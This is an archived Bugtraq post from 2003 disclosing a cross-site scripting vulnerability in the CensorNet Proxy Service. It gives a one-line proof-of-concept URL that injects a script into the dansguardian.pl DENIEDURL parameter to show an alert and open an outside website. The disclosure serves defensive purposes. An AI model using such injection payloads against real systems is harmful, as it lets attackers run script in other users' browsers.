Bugtraq mailing list archives
CensorNet: Cross Site Scripting Vulnerability
From: "Richard Maudsley" <maudr001 () rbwm org>
Date: Wed, 22 Oct 2003 12:51:13 +0100
Hello, A cross site scripting vulnerability exists in the CensorNet Proxy Service (www.censornet.com) that allows scripting (and html) to be passed to the cgi script and displayed in the web browser. Exploit: http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk")</script> Regards, Richard Maudsley - ------------------------------------------------------------------- This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the content of this email please contact abuse () rbwm org - -------------------------------------------------------------------
Current thread:
- CensorNet: Cross Site Scripting Vulnerability Richard Maudsley (Oct 23)
- Message not available
- Re: CensorNet: Cross Site Scripting Vulnerability Dan Searle (Oct 27)
- Re: CensorNet: Cross Site Scripting Vulnerability Richard Maudsley (Oct 27)
- Re: CensorNet: Cross Site Scripting Vulnerability Dan Searle (Oct 27)
- Message not available